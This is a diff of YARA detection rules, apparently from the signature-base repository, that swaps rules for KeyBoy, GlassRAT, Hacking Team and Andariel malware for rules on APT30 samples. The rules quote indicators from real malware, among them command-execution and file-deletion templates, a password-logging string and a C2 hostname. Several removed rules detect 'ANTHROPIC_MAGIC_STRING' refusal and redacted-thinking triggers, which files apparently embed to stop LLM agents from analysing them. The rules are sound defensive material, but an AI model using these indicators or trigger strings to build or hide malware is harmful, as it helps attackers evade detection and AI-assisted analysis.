-		$x1 = "rundll32.exe %s SSSS & exit" fullword ascii
-		$x2 = "D:\\Work\\Project\\VS\\HSSL\\HSSL_Unicode _2\\Release\\ServiceClient.pdb" fullword ascii
-		$s1 = "cmd.exe /c \"%s\"" fullword ascii
-		$s2 = "CreateProcess failed (%d)" fullword ascii
-		$s3 = "ServiceClient.dll" fullword ascii
-		$s4 = "NtWow64QueryInformationProcess64 failed" fullword ascii
-		$s5 = "pid:%d CmdLine:%S" fullword ascii
-		$s6 = "rasauto32.ServiceMain" fullword ascii
-		$s7 = "del /q/f %s\\%s*" fullword ascii
-		$s8 = "szTmpDll:%s" fullword ascii
-		$s9 = "lpCmdLine:%s" fullword ascii
-		$s0 = "ReleaseFileFromRes:%s ok!" fullword ascii
+		$s0 = "\\Windo" ascii
+		$s2 = "HHOSTR" ascii
+		$s3 = "Softwa]\\Mic" ascii
+		$s4 = "Startup'T" fullword ascii
+		$s17 = "help32Snapshot0L" fullword ascii
+		$s18 = "TimUmoveH" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.exports ( "SSSS" ) or 1 of ( $x* ) or 4 of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Keyboy_876_0X4E20000 : FILE
+rule SIGNATURE_BASE_APT30_Sample_16 : FILE
 {
 	meta:
-		description = "Detects KeyBoy Backdoor"
-		author = "Markus Neis, Florian Roth"
-		id = "0b871f62-0f7c-5c94-9b3d-f68832ab64b4"
-		date = "2018-03-26"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_keyboys.yar#L128-L155"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L389-L407"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "092bb19cd7a4250560ea71a3e54780a8fd34a229caa294e4cd5b6d522850d519"
+		hash = "066d06ac08b48d3382d46bbeda6ad411b6d6130e"
+		logic_hash = "59ea90ac0590bd87a48fabf1a3fa7ece31560b980b738a34227937bbf82a1c55"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		hash1 = "6e900e5b6dc4f21a004c5b5908c81f055db0d7026b3c5e105708586f85d3e334"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "%s\\rundll32.exe %s ServiceTake %s %s" fullword ascii
-		$x2 = "#%sCmd shell is not running,or your cmd is error!" fullword ascii
-		$x3 = "Take Screen Error,May no user login!" fullword ascii
-		$x4 = "Get logon user fail!" fullword ascii
-		$x5 = "8. LoginPasswd:%s" fullword ascii
-		$x6 = "Take Screen Error,service dll not exists" fullword ascii
-		$s1 = "taskkill /f /pid %s" fullword ascii
-		$s2 = "TClient.exe" fullword ascii
-		$s3 = "%s\\wab32res.dll" fullword ascii
-		$s4 = "%s\\rasauto.dll" fullword ascii
-		$s5 = "Download file:%s index:%d" fullword ascii
-		$s6 = "LogonUser: [%s]" fullword ascii
+		$s0 = "\\Temp1020.txt" ascii
+		$s1 = "cmcbqyjs" fullword ascii
+		$s2 = "SPVSWh\\" fullword ascii
+		$s4 = "PSShxw@" fullword ascii
+		$s5 = "VWhHw@" fullword ascii
+		$s7 = "SVWhHw@" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 3 of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Glassrat
+rule SIGNATURE_BASE_APT30_Generic_A : FILE
 {
 	meta:
-		description = "Detects GlassRAT by RSA (modified by Florian Roth - speed improvements)"
-		author = "RSA RESEARCH"
-		id = "7739d1f6-f16d-5599-9388-a1d89dbeb355"
-		date = "2015-11-03"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6b851d94-d3bd-5c76-8fd0-adb42b3fab73"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_glassRAT.yar#L8-L43"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L409-L429"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "939d2cb11ff414641f68b2913fe8d24458e1fd7ba450b8781072bb10da3ad039"
+		logic_hash = "c20660a8a55c6c6cb058fb233e0b29e1e4be2683181dbdfb06e17037d0ed8c31"
 		score = 75
 		quality = 85
-		tags = ""
-		Info = "GlassRat"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9f49aa1090fa478b9857e15695be4a89f8f3e594"
+		hash2 = "396116cfb51cee090822913942f6ccf81856c2fb"
+		hash3 = "fef9c3b4b35c226501f7d60816bb00331a904d5b"
+		hash4 = "7c9a13f1fdd6452fb6d62067f958bfc5fec1d24e"
+		hash5 = "5257ba027abe3a2cf397bfcae87b13ab9c1e9019"
 
 	strings:
-		$bin1 = {85 C0 B3 01}
-		$bin3 = {68 4C 50 00 10}
-		$bin4 = {68 48 50 00 10}
-		$bin5 = {68 44 50 00 10}
-		$hs = {CB FF 5D C9 AD 3F 5B A1 54 13 FE FB 05 C6 22}
-		$s1 = "pwlfnn10,gzg"
-		$s2 = "AddNum"
-		$s3 = "ServiceMain"
-		$s4 = "The Window"
-		$s5 = "off.dat"
+		$s5 = "WPVWhhiA" fullword ascii
+		$s6 = "VPWVhhiA" fullword ascii
+		$s11 = "VPhhiA" fullword ascii
+		$s12 = "uUhXiA" fullword ascii
 
 	condition:
-		all of ( $bin* ) and $hs and 3 of ( $s* )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Glassrat_Generic : FILE
+rule SIGNATURE_BASE_APT30_Sample_17 : FILE
 {
 	meta:
-		description = "Detects GlassRAT Malware"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d09c4a9f-15ad-56d7-b015-94f494420e98"
-		date = "2015-11-23"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/peering-into-glassrat/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_glassRAT.yar#L45-L72"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L431-L445"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fdd309c403e53bfa80340c1334f90fd5ef5f4618737b19069a07f7aa63aeb23d"
-		score = 80
+		hash = "c3aa52ff1d19e8fc6704777caf7c5bd120056845"
+		logic_hash = "43913151325fbce993dbfec0acf64ca835b12270c47156ae81b0ce4f32c7bde1"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "30d26aebcee21e4811ff3a44a7198a5c519843a24f334880384a7158e07ae399"
-		hash2 = "3bdeb3805e9230361fb93c6ffb0bfec8d3aee9455d95b2428c7f6292d387d3a4"
-		hash3 = "79993f1912958078c4d98503e00dc526eb1d0ca4d020d17b010efa6c515ca92e"
-		hash4 = "a9b30b928ebf9cda5136ee37053fa045f3a53d0706dcb2343c91013193de761e"
-		hash5 = "c11faf7290299bb13925e46d040ed59ab3ca8938eab1f171aa452603602155cb"
-		hash6 = "d95fa58a81ab2d90a8cbe05165c00f9c8ad5b4f49e98df2ad391f5586893490d"
-		hash7 = "f1209eb95ce1319af61f371c7f27bf6846eb90f8fd19e8d84110ebaf4744b6ea"
 
 	strings:
-		$s1 = "cmd.exe /c %s" fullword ascii
-		$s2 = "update.dll" fullword ascii
-		$s3 = "SYSTEM\\CurrentControlSet\\Services\\RasAuto\\Parameters" fullword ascii
-		$s4 = "%%temp%%\\%u" fullword ascii
-		$s5 = "\\off.dat" ascii
-		$s6 = "rundll32 \"%s\",AddNum" fullword ascii
-		$s7 = "cmd.exe /c erase /F \"%s\"" fullword ascii
-		$s8 = "SYSTEM\\ControlSet00%d\\Services\\RasAuto" fullword ascii
+		$s1 = "Nkfvtyvn}]ty}ztU" fullword ascii
+		$s4 = "IEXPL0RE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 15MB and 5 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_SUSP_Claude_Refusal_Magic_String_Jan26
+rule SIGNATURE_BASE_APT30_Sample_18 : FILE
 {
 	meta:
-		description = "Detects refusal magic string that cause Claude sessions to be terminated. This might indicate that a file tries to prevent being analyzed by LLM agents."
-		author = "Marius Benthin"
-		id = "13e9c713-0201-5c5c-bc42-de898c0d8b95"
-		date = "2026-01-29"
-		modified = "2026-01-29"
-		reference = "https://x.com/williballenthin/status/2014687699165135150"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_claude_magic_strings.yar#L1-L13"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L446-L466"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ffa48ed4b7b48897f6756c4222b2606399de0bca627cedfddf61e69986580430"
-		logic_hash = "ae5b451168d03440f84b89d96db2688f828e5dcbcdd1121edf3fb973571d2dbd"
+		hash = "355436a16d7a2eba8a284b63bb252a8bb1644751"
+		logic_hash = "d20f1d1b7b43defc36c7b1f99f14ed9e73e770b6f43d0ad92110cf9178b35b15"
 		score = 75
-		quality = 83
-		tags = ""
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "ANTHROPIC_MAGIC_STRING_TRIGGER_REFUSAL_" ascii wide nocase
+		$s0 = "w.km-nyc.com" fullword ascii
+		$s1 = "tscv.exe" fullword ascii
+		$s2 = "Exit/app.htm" ascii
+		$s3 = "UBD:\\D" ascii
+		$s4 = "LastError" ascii
+		$s5 = "MicrosoftHaveAck" ascii
+		$s7 = "HHOSTR" ascii
+		$s20 = "XPL0RE." ascii
 
 	condition:
-		$x1
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_Claude_Refusal_Magic_String_Jan26
+rule SIGNATURE_BASE_APT30_Generic_G : FILE
 {
 	meta:
-		description = "Detects Base64 variations of refusal magic string that cause Claude sessions to be terminated. This might indicate that a file tries to prevent being analyzed by LLM agents."
-		author = "Marius Benthin"
-		id = "96b73331-989f-5af5-8f17-30b99fcc2800"
-		date = "2026-01-29"
-		modified = "2026-01-29"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_claude_magic_strings.yar#L15-L26"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "34269de3-4559-58a5-a621-0ad72857dc9e"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L468-L489"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e1c070b77e3568966f605fa47a2b3be917065954bc157e3721ff2fb3ac4d72f7"
-		score = 80
+		hash = "1612b392d6145bfb0c43f8a48d78c75f"
+		hash = "53f1358cbc298da96ec56e9a08851b4b"
+		hash = "c2acc9fc9b0f050ec2103d3ba9cb11c0"
+		hash = "f18be055fae2490221c926e2ad55ab11"
+		logic_hash = "6926d73839958acd06835c1943edb150a0f60cdc269fac053531a0e0483e0521"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xb1 = "ANTHROPIC_MAGIC_STRING_TRIGGER_REFUSAL_" ascii wide base64 base64wide
+		$s0 = "%s\\%s\\%s=%s" fullword ascii
+		$s1 = "Copy File %s OK!" fullword ascii
+		$s2 = "%s Space:%uM,FreeSpace:%uM" fullword ascii
+		$s4 = "open=%s" fullword ascii
+		$s5 = "Maybe a Encrypted Flash Disk" fullword ascii
+		$s12 = "%04u-%02u-%02u %02u:%02u:%02u" fullword ascii
 
 	condition:
-		$xb1
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_SUSP_Claude_Redacted_Thinking_Magic_String_Jan26_1
+rule SIGNATURE_BASE_APT30_Sample_19 : FILE
 {
 	meta:
-		description = "Detects redacted thinking magic string that cause Claude sessions to be terminated. This might indicate that a file tries to prevent being analyzed by LLM agents."
-		author = "Marius Benthin"
-		id = "005732f9-015a-5741-8b39-b1a32812c96d"
-		date = "2026-01-29"
-		modified = "2026-01-29"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_claude_magic_strings.yar#L28-L40"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-03"
+		modified = "2023-01-06"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L491-L517"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ffa48ed4b7b48897f6756c4222b2606399de0bca627cedfddf61e69986580430"
-		logic_hash = "02b85e9df893d6be91f8053ac67884e5a24893ef225ca0e7b3878b38afb79420"
-		score = 65
-		quality = 83
-		tags = ""
+		hash = "cfa438449715b61bffa20130df8af778ef011e15"
+		logic_hash = "9127ae31c5b818a2759f9d33c74c8631079539e7fa8e49e5514b016df2624065"
+		score = 75
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$x1 = "ANTHROPIC_MAGIC_STRING_TRIGGER_REDACTED_THINKING_" ascii wide nocase
+		$s0 = "C:\\Program Files\\Common Files\\System\\wab32" fullword ascii
+		$s1 = "%s,Volume:%s,Type:%s,TotalSize:%uMB,FreeSize:%uMB" fullword ascii
+		$s2 = "\\TEMP\\" ascii
+		$s3 = "\\Temporary Internet Files\\" ascii
+		$s5 = "%s TotalSize:%u Bytes" fullword ascii
+		$s6 = "This Disk Maybe a Encrypted Flash Disk!" fullword ascii
+		$s7 = "User:%-32s" fullword ascii
+		$s8 = "\\Desktop\\" ascii
+		$s9 = "%s.%u_%u" fullword ascii
+		$s10 = "Nick:%-32s" fullword ascii
+		$s11 = "E-mail:%-32s" fullword ascii
+		$s13 = "%04u-%02u-%02u %02u:%02u:%02u" fullword ascii
+		$s14 = "Type:%-8s" fullword ascii
 
 	condition:
-		$x1
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and 8 of them
 }
-rule SIGNATURE_BASE_SUSP_Claude_Redacted_Thinking_Magic_String_Jan26_2
+rule SIGNATURE_BASE_APT30_Generic_E_V2 : FILE
 {
 	meta:
-		description = "Detects Base64 variations of redacted thinking magic string that cause Claude sessions to be terminated. This might indicate that a file tries to prevent being analyzed by LLM agents."
-		author = "Marius Benthin"
-		id = "9c2f1cb1-e70d-5da4-843e-a31b39f492ff"
-		date = "2026-01-29"
-		modified = "2026-01-29"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_claude_magic_strings.yar#L42-L53"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "40897687-fb17-568e-9907-e9588a53bbe0"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L519-L535"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3b901ffeaff1e4bef579df00e4e99fe8f9eb4ae9ee8e8bde7a730f0fd4646762"
+		hash = "eca53a9f6251ddf438508b28d8a483f91b99a3fd"
+		logic_hash = "25a7e5780f56b4f9cfb76494926c446a39a88bef2cda82b31e6de2b85c5edbda"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xb1 = "ANTHROPIC_MAGIC_STRING_TRIGGER_REDACTED_THINKING_" ascii wide base64 base64wide
+		$s0 = "Nkfvtyvn}duf_Z}{Ys" fullword ascii
+		$s1 = "Nkfvtyvn}*Zrswru1i" fullword ascii
+		$s2 = "Nkfvtyvn}duf_Z}{V" fullword ascii
+		$s3 = "Nkfvtyvn}*ZrswrumT\\b" fullword ascii
 
 	condition:
-		$xb1
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Bin_Ndisk : FILE
+rule SIGNATURE_BASE_APT30_Sample_20 : FILE
 {
 	meta:
-		description = "Hacking Team Disclosure Sample - file ndisk.sys"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f442315e-67c2-55a5-954e-8e7e48aa1243"
-		date = "2015-07-07"
+		id = "91246101-246b-5da9-9e55-7f361d1f6437"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/en/file/a03a6ed90b89945a992a8c69f716ec3c743fa1d958426f4c50378cca5bef0a01/analysis/1436184181/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hackingteam_rules.yar#L10-L31"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L537-L557"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cf5089752ba51ae827971272a5b761a4ab0acd84"
-		logic_hash = "d93147e9631065eab35cbbc4ce112cfef92f81063cf8570bc021fbfe72811ab6"
-		score = 100
+		hash = "b1c37632e604a5d1f430c9351f87eb9e8ea911c0"
+		logic_hash = "f94cbd4b8e7ba302db9ac4ef3617bd68aa0aa1ee3cfc6dfee4621223bbdae3c5"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\Registry\\Machine\\System\\ControlSet00%d\\services\\ndisk.sys" fullword wide
-		$s2 = "\\Registry\\Machine\\System\\ControlSet00%d\\Enum\\Root\\LEGACY_NDISK.SYS" fullword wide
-		$s3 = "\\Driver\\DeepFrz" wide
-		$s4 = "Microsoft Kernel Disk Manager" fullword wide
-		$s5 = "ndisk.sys" fullword wide
-		$s6 = "\\Device\\MSH4DEV1" wide
-		$s7 = "\\DosDevices\\MSH4DEV1" wide
-		$s8 = "built by: WinDDK" fullword wide
+		$s0 = "dizhi.gif" fullword ascii
+		$s2 = "Mozilla/u" ascii
+		$s3 = "XicrosoftHaveAck" ascii
+		$s4 = "flyeagles" ascii
+		$s10 = "iexplore." ascii
+		$s13 = "WindowsGV" fullword ascii
+		$s16 = "CatePipe" fullword ascii
+		$s17 = "'QWERTY:/webpage3" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 6 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Hackingteam_Elevator_DLL : FILE
+rule SIGNATURE_BASE_APT30_Sample_21 : FILE
 {
 	meta:
-		description = "Hacking Team Disclosure Sample - file elevator.dll"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d479c675-b200-56e3-8976-f70b45ea791e"
-		date = "2015-07-07"
+		id = "72005b40-91f7-5661-9478-8680f999b245"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://t.co/EG0qtVcKLh"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hackingteam_rules.yar#L33-L56"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L559-L575"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b7ec5d36ca702cc9690ac7279fd4fea28d8bd060"
-		logic_hash = "f2860c0bb6176f7cc57cb703e9d4235c4cf0b9cc1c0e7c47fb4c8ba47155a616"
-		score = 70
+		hash = "d315daa61126616a79a8582145777d8a1565c615"
+		logic_hash = "e3e431bb6915d99b8aa1915419b60ba47372005b9b4994a924746a91bad80310"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\sysnative\\CI.dll" ascii
-		$s2 = "setx TOR_CONTROL_PASSWORD" fullword ascii
-		$s3 = "mitmproxy0" fullword ascii
-		$s4 = "\\insert_cert.exe" ascii
-		$s5 = "elevator.dll" fullword ascii
-		$s6 = "CRTDLL.DLL" fullword ascii
-		$s7 = "fail adding cert" fullword ascii
-		$s8 = "DownloadingFile" fullword ascii
-		$s9 = "fail adding cert: %s" fullword ascii
-		$s10 = "InternetOpenA fail" fullword ascii
+		$s0 = "Service.dll" fullword ascii
+		$s1 = "(%s:%s %s)" fullword ascii
+		$s2 = "%s \"%s\",%s %s" fullword ascii
+		$s5 = "Proxy-%s:%u" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 6 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Hackingteam_Elevator_EXE : FILE
+rule SIGNATURE_BASE_APT30_Sample_22 : FILE
 {
 	meta:
-		description = "Hacking Team Disclosure Sample - file elevator.exe"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a68b68dd-372d-5572-a1e7-1b7e06e986d8"
-		date = "2015-07-07"
+		id = "6c1b3dd2-4383-51a2-9185-2365a4d1e784"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "Hacking Team Disclosure elevator.c"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hackingteam_rules.yar#L58-L86"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L577-L595"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9261693b67b6e379ad0e57598602712b8508998c0cb012ca23139212ae0009a1"
-		logic_hash = "58f3c28fa69da0329a4cd5451a86260056076a9d0094965e9c23a63ef72cfc98"
-		score = 70
-		quality = 81
+		hash = "0d17a58c24753e5f8fd5276f62c8c7394d8e1481"
+		logic_hash = "88a45d248eba7b9776e2e7d345d2948e00a94a7e359acb89d1943be55ab342ad"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "40a10420b9d49f87527bc0396b19ec29e55e9109e80b52456891243791671c1c"
-		hash2 = "92aec56a859679917dffa44bd4ffeb5a8b2ee2894c689abbbcbe07842ec56b8d"
 
 	strings:
-		$x1 = "CRTDLL.DLL" fullword ascii
-		$x2 = "\\sysnative\\CI.dll" ascii
-		$x3 = "\\SystemRoot\\system32\\CI.dll" ascii
-		$x4 = "C:\\\\Windows\\\\Sysnative\\\\ntoskrnl.exe" fullword ascii
-		$s1 = "[*] traversing processes" fullword ascii
-		$s2 = "_getkprocess" fullword ascii
-		$s3 = "[*] LoaderConfig %p" fullword ascii
-		$s4 = "loader.obj" fullword ascii
-		$s5 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3" ascii
-		$s6 = "[*] token restore" fullword ascii
-		$s7 = "elevator.obj" fullword ascii
-		$s8 = "_getexport" fullword ascii
+		$s1 = "(\\TEMP" fullword ascii
+		$s2 = "Windows\\Cur" fullword ascii
+		$s3 = "LSSAS.exeJ" fullword ascii
+		$s4 = "QC:\\WINDOWS" fullword ascii
+		$s5 = "System Volume" fullword ascii
+		$s8 = "PROGRAM FILE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of ( $x* ) and 3 of ( $s* )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Scheduledtask_Loader : FILE
+rule SIGNATURE_BASE_APT30_Generic_F : FILE
 {
 	meta:
-		description = "Detects a scheduled task loader used by Andariel"
-		author = "CISA.gov"
-		id = "0c32758b-480c-5784-b28f-cee85d038850"
-		date = "2024-07-25"
-		modified = "2026-01-29"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_andariel_jul24.yar#L3-L18"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cff8b921-9afc-5a52-84cb-825de33fc86e"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L597-L615"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2d32ee777cb40c6fa58787e92c0de074ea5b81d629a17ccb4f9432d62436f03c"
-		score = 80
+		logic_hash = "4997b52e0cc12a1a0c84cec3565dd9e6b486ccef4eb8791c566c7a534d36e3ff"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "09010917cd00dc8ddd21aeb066877aa2"
+		hash2 = "4c10a1efed25b828e4785d9526507fbc"
+		hash3 = "b7b282c9e3eca888cbdb5a856e07e8bd"
+		hash4 = "df1799845b51300b03072c6569ab96d5"
 
 	strings:
-		$obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 }
